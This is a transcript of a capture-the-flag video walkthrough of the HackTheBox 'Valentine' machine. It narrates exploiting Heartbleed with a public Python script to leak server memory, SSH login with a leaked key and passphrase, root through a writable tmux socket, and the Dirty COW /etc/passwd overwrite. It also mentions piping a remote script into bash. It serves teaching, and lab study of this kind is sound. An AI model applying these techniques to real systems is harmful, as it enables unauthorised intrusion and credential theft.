What's going on YouTube? This is Ipsec and we're doing Valentine from HackTheBox, and believe it or not, this is the first video I've recorded in like 3 weeks. I haven't even touched Kali in 3 weeks because I was on vacation, so we're going to see how this goes. This box was released on Valentine's Day, so Heartbleed is a very fitting vulnerability for it. If you couldn't guess by the logo, yes, this is a Heartbleed box, so let's just jump on in. As always, we start off with the nmap, so nmap-sc for default scripts, sv, enumerate version, 08, output all formats, put in the directory nmap and call it Valentine, and then the IP address, which is 10.10.10.79. It does take some time to run, so I've already ran it. Looking at the results, we don't really see too much interesting here right off the bat. We have SSH on port 22, HTTP on 80, and HTTPS on 443. But if you look deep in the nmap scan and look at the versions, you'll notice something a bit off. OpenSSH 5.9, it is a Ubuntu server, and we're used to seeing 7.2 here, and I think for Ubuntu 2.2. And I say we're used to seeing that because that is Ubuntu Xennial, which is a recent release of Ubuntu. 5.9 is much less than 7.2, so this is probably going to be an old version. It's also backed up by HTTP 2.2.22 because we're used to seeing 2.4.18. So let's see exactly what version of Ubuntu this is. So we can Google Ubuntu 2.2.22 and Apache. Now we're going to go look for the Launchpad League, which is the package manager, and it'll tell us what distro that version was uploaded to. And looking at this, it is uploaded to Precise. So if we Google Ubuntu releases Precise and go to the releases page on the wiki, we're going to be able to see all the Ubuntu releases. First up is probably going to be the current releases. And when that finally loads, we'll see what they are. Bionic Beaver, which is Ubuntu 18. Xennial Xeris, which is 16.04. Trusty Tur, which is 14.04. A future release is Cosmic Cuttlefish, which is 18.10, and then we get to all the end-of-life builds that aren't really being updated anymore. We have Artful Aardvark, which is 17.10, Zesty Zapdos, Zappos, which is 17.04. I always say Zapdos. Yakety Yak 16.10, and how Ubuntu does this, the .10s are pretty much like the bleeding edge, and then the 14.04 is LTS, the long-term support. So that's why we see like 17 and 16 down here in end of life, and 16 and 14 are still current because these are the long-term support, while this is the .10 versions. 15.10 Wily Werewolf, 15.04 Vivid Velvet, 14.10 Utopic Unicorn, 13.10 Saucy Salamander. I have no idea how they come up with these names, but go all the way down to 12.04, we have Precise Pangolin, and this was released in 2004 or 2012, and that's pretty old. So since it's an old release, let's just run a vulnerability scan against it. Normally you don't get a win, but when something's end of life, you may actually get a win here. So we're going to do nmap-script vuln to run vulnerability scripts, and I have a video that explains all the scripts in nmap. I'll put it in the description. I can't remember off the top of my head. I'll put all formats. We'll do vuln scan, and then 10.10.10.79. This is going to take some time to run, so while that runs, let's also just do a GoBuster on the website, because we always do GoBuster. So GoBuster-U for URL, 10.10.10.79-W for word list, user share word list, GoBuster, then we want directory list 2.3 medium, and then -O for out, and we'll put GoBuster.log. To speed this up, we'll do 50 threads with -T50. While that goes, let's just go over to the website, 10.10.10.79, and a big old picture pops up, and this is the Heartbleed logo, which is a, I think, 2014 vulnerability, which is when Precise Pangolin was end of life. So chances are we want to exploit Heartbleed on this box. But let's go dig in a little bit more. We can try HTTPS. We get the same exact thing. We can try common things like robots.txt, and it's not found. If we go back to our nmap, that vulnerability scan has finished. So let's go take a look at what it found. It starts up right here, and for SSH, the vuln scan found nothing. HTTP, it couldn't find any cross-site request forgery vulnerabilities, DOM-based cross-site scripting. Did find a dev folder and potentially a folder called index, which is interesting. So it does a basic dir bust. Couldn't find any stored XSS. I don't even know what this 2017 CVE is, but script execution failed, so it wants to debug. We're not going to worry about that. The SSL variant of HTTP, HTTPS, same things found, but we also have SSL checks. And we have a man-in-the-middle vulnerability and Heartbleed. So this is confirmed vulnerable to Heartbleed. There's also Poodle, which is another attack that's, I think, more man-in-the-middle-y. And I think there's an application called SSL Lies, and let's just see if that also does it. So I'm going to specify that and 443. And this is just a SSL scanner I thought of as I was reading, and maybe I have to specify plugins. Let's see. -- Heartbleed. So we can do SSL Lies -- Heartbleed 10.10.10.79. And it also confirms that it is vulnerable. This is a cool tool because there are flags that will output like all the ciphers that website supports. Let's see, we have like SSL v2 scans, TLS v1, but a bunch of various SSL scans with SSL lies. I should have looked more into how to use that before I mention it, but we'll just move on and exploit Heartbleed. So we could use Metasploit, but in order to explain Heartbleed, it's going to work better if we just use a Python script off GitHub, because Python is much easier to read than Metasploit modules in Ruby code. So I'm going to Google Python Heartbleed GitHub, and we're just going to randomly look at that very first one. So clicking this, let's click raw. And then we can git clone, paste this in, wget, my bad, vim heartbleed.py. And before we dig into this, let's go to the best way to explain it with good old XKCD. And we're going to search XKCD Heartbleed to bring up the comment, or comic, because XKCD always has a relevant comic. Let's get this bigger so you can read it. So, Heartbleed is a memory bug, I guess you can say. So how it works is it exploits a heartbeat. The heartbeat essentially works by us saying, hey, reply to us with this word, and this word is 6 letters. And the server is going to respond with that word in 6 letters to let us know it is still there. And essentially, here's us asking, hey, are you there? If so, respond with potato and use 6 letters to spell potato. And the server process thinks, it puts in memory, user Meg wants these 6 letters, potato. And you can see all this gray around it. This is the memory of the server, and right after potato is just random junk in the memory. And here's the server. It finds potato and responds with potato. And our user's thinking, okay, are you still there? If so, respond bird with 4 letters. And we can see the memory around this has changed a little bit. There are currently 348 connections open right after that. And this is user Ada, because it just places things randomly in memory. And now it says user Meg wants these 4 letters, bird, and pulls that out, pulls bird, and grabs 4 letters. So if we say something like, hey, are you still there? If so, respond hat and 500 letters. And now the server puts it back into memory. It's searching for hat, and it finds that, but it's going to grab 500 letters after that and give us everything. And this is just giving us random pieces of memory, which could be sensitive things on the server, like a SSH key or passwords or anything. It could be literally anything in memory. So, looking at this Python script, let's scroll down. We have a bunch of arguments here. And then we're building the TLS header. So, here's the head, it doing the handshake, maybe generating some random stuff because it's SSL and it needs quote-unquote random, but the server doesn't know it, so it's going to respond the same thing every time. I actually don't know the whole TLS header, surprisingly. Probably the cipher suites that are accepted, compression method to be used, extension length, elliptical curve settings, session ticket stuff. And then we got the build heartbeat stuff. And here I think is where we're asking for like potato and then saying the length. So we're asking for a length of, I guess, 40 right here, and that'll be 64 bytes. Or maybe it's going to be a lot more than that. Maybe that's hex 400. We'll see what that is. So if we do Python Heartbleed to see how to run this, looks like we can just do, we want hex output because that's going to tell us how many bytes there are in the output easily. And then 10, 10, 10, 79. And it looks like it stops at 4,000 hex. And we can scroll up to see stuff. Doesn't look like much stuff was in this heartbeat. So let's see. Let's run this again. Still not much. Still nothing. Let's do dash. Let's see. Put this in a loop, I guess. For I and sec 000. Do. Done. And we'll see if this output changes much. Doesn't look like the output is changing. Control C out of that. Let's just edit this script. And let's change that 40. Let's make this a quarter of it. We'll do 1,000 instead of 4,000 hex. And now when we run this, the output actually changed. But we see it stopped right around 1,000 bytes of output. If we change that to, let's see, 2,000, it's going to respond with around 2,000 hex of output. So that is how Heartbleed works. If we just run that without the hex dump, we can see random data. If we go up a few times, we do see it actually outputting something that was probably useful in memory, because I saw a base 64, if I could find it. Let's just search equals. I guess we're going to have to exploit it again. Just do it a few times. Let's see. Instead of 20, let's do 1,000. That's going to, yep. So let's try changing this to the length of, let's do max FF, which I think is too big for it to actually respond. So yeah, around 4,000 is the maximum. See, does this have a thing to run in a loop? If we do Python Heartbleed, let's see, number of times to run. So instead of looping it, let's just do -n 100. Python Heartbleed -n 100, 10, 10, 10, 79. And now we're going to output the, I guess, 4,000 bytes 100 times. And while that runs, let's check the other directories. So we got dev, encode, decode, and OMG. So if we go to OMG, sounds interesting. So let's just check what that is. It is just the picture. If we go to dev, we have hype key and notes. If we go to notes to do coffee, research, fix encoder, decoder before going live. This is done only on client side. Don't use and find a better way to take notes. If we go to hype.key, we see a bunch of hex, it looks like. And just glancing at this, I think this is ASCII because we see, looks like a bunch of equal signs maybe. It's not the equal dash, it's some symbol. But we also see a few 0D, 0A, which is a line terminator. So I'm just going to Google like ASCII to hex to ASCII. Go here. Paste this in, convert it, and we have a encrypted RSA key, probably to be used with SSH. So let us save that key. So we'll call this hype.key because that was the name of it. Go back to this Heartbleed thing. And just glancing over at what memory it leaked. So we have one of it leaking, probably us going to dev actually. And going up, still, that's a decode. We have someone running this decode.php and putting this text in. And that is base 64. Again, they're doing that. So if we echo -n, that, base64-d, we get Heartbleed, believe the hype. So again, if we look at that HTTP request, agvh, let's just search. Did that give us the IP address where it came from? Doesn't appear to, but Heartbleed, believe the hype. Which is interesting because if we looked at the key we just saved, hype.key, we have a encrypted SSH key. Or what believes to be an SSH key. If we try to use this, if we do file, does it say it? Hype.key, PAM RSA private key. So let's chmod this to 600 so we can use it. And then try SSH-I hype key. And I'm going to specify the user hype because again, that is what the server had called it, hype_key. That is like the standard SSH naming convention. You have like ID_RSA, which is the default key, and then username_key for various keys. So do hype at 10.10.10.79. And this will take a little while to negotiate the SSH connection. Come on. Port 22 is open, right? Nmap, Valentine.nmap. Yeah, 22 is open. There we go. Copy this again, paste it in, and we get login. So we are hype at Valentine. If we do a ls, we can go to the desktop and get user.txt. And we see it is 33 characters, which is 32 in a line break, so that is the MD5 summon. Got the user. So, as always, the very first thing we want to do is let's run a Linux enumeration script. So opt, let's do Linux Privesc and probably linenum.sh. So python-m, simple HTTP server, and what IP address am I? 10.0, 10.10.14.3. So let's just curl 10.10.14.3 linenum.sh, pipe that to bash to execute it. I didn't specify a port on simple HTTP server, so it's running on port 8000. This script will take a few seconds to run. Going to the top, let's see. Kernel was built in 2012, so a lot of vulnerabilities will work, especially probably Dirty Cow. Let's see, more kernel stuff. Ubuntu 12.04 precise, we got that correct. UID for hype 1000. We have the actual user logged in from PTS 0, so this has a physical login on it, it looks like. Oh no, that's us. The physical user is not logged in. I'm used to doing like a reverse shell where we don't show up who else is logged on, but no, that is us. If it was a physical login, it would be TTY1, not PTS. Because that's sudo, not physical. Let's see. Accounts. Let's go back up. Let's see if it saw anything else. Where did it leave off? Okay. So groups, nothing interesting. Home directory. World readable files. Home directory contents. Bash history. February 16th. It's 131 bytes. So we got something in that bash history. That should be worth looking into. Got that RSA key. We don't really have to look into that because we know what the contents are because we got it. SSH TTY, available shells. Cron jobs, nothing looks too interesting. Contents, nothing. IP address. TCP connections. Running processes. Just glancing over. Looks like a weird Apache that is defunct. Not sure exactly what that is. Root SSH. That's a hype login. There should be something in this PS output. It's hard to see when you're just looking in this output, so I'm going to grep it later for just root running processes. init.d. Installed Apache modules. Set UID files. Nothing looks out of ordinary there. Those set GID files look all normal. So let's first look at our bash history file. And we see tmux-s on devs dev/sesh. And if we do a ps-ef, and let's just grep for root to show all of root running processes. And let's see what there is. So all those we can ignore. There should be one that is good. There we go. So we see root is running tmux. So if we look at this tmux socket file, we do ls-la on that, we see it is owned by root, but the group owner is hype, which is us. And that is read-write. If we do groups, we're that. Okay. So we are a member of the hype group, and we have read-write access to the file that tmux is using as a socket. So if we do tmux-S, if we spell tmux correctly, and then specify that file, we can hop on that tmux session. And there we go. We hopped on the tmux session, and root had left it open, and we could read and write there. So we can now do an ID, we are root, and we can also do a wc-c on root.txt, and we could have read that. And curl.sh, this is that post request that is adding Heartbleed into the memory. So that is the box. If we wanted to, we could also do dirty cow real quick. So let's try that. Let's just do dirty cow. Is it .ninja? Let's just Google dirty cow ninja. View the exploit. Go to one of the last POCs because that's probably the later one. Calcron, Red Hat, Android. That's a tester. We'll do dirty.c. Etsy passwd based root. I think this one changed the password to be firefart. Exploit. Let's see. Yeah, afterwards you can either enter su firefart. So let's see. Compile instructions, are they in here? There we go. GCC-p thread. So we should be good. So if we do GCC, it is installed in this box. So we'll do vim dirty.c. vi dirty.c. There we go. Set paste. Paste the code in. Grep the file for GCC so we can get the compile instructions. Copy this. Paste it. And then we'll run dirty cal. And it's going to change this password to be Firefoot for the root user. This is going to take a little while, so let's just Control-C out of this, and we can SSH to test it. So 10.10.10.79 probably takes 15-20 seconds to the SSH prompt to come back. And then we can try typing the password Firefoot. May have specified the user Firefoot as well, because that's adding the user Firefoot and then UID GID 0. So my bad there. It's been a while since I did this exploit. SH as this user. And we could probably Control-C the exploit and SU now, and it will probably work. Paste the password. Denied. I wonder if something happened to patch dirty cal, or it just hasn't been long enough. Try it one time, and then I'll pause the video, give it a few minutes, and then we'll try again. It could just be this box is running so slow, it's taking a while for dirty cal to work. But being on a kernel from 2012, definitely should work. Let's try root one last time. Let's see, run. Afterwards, you can either SU. Yeah, well, it should have been fine. Is root login blocked? SU Firefoot. Nope. PassWD still looks normal. No, we got that there. That is odd. That has been modified, but we can't SU. Bizarre. Because this definitely overwrote Etsy PassWD. And that's probably the descripted version of the password Firefoot. Unless it just put it to no password. Oh, when I hit enter, it asked me what I wanted to set the password for. I hit enter, which is a blank password. So there's now no password on the server. I thought if you hit enter, it defaulted to Firefoot. But no. Blank password. There we go. So that is the box. And I guess my ignorance on that one exploit script, I would have assumed it set the password to the default if you did nothing for the password. But nope. So take care, guys, and I'll see you around.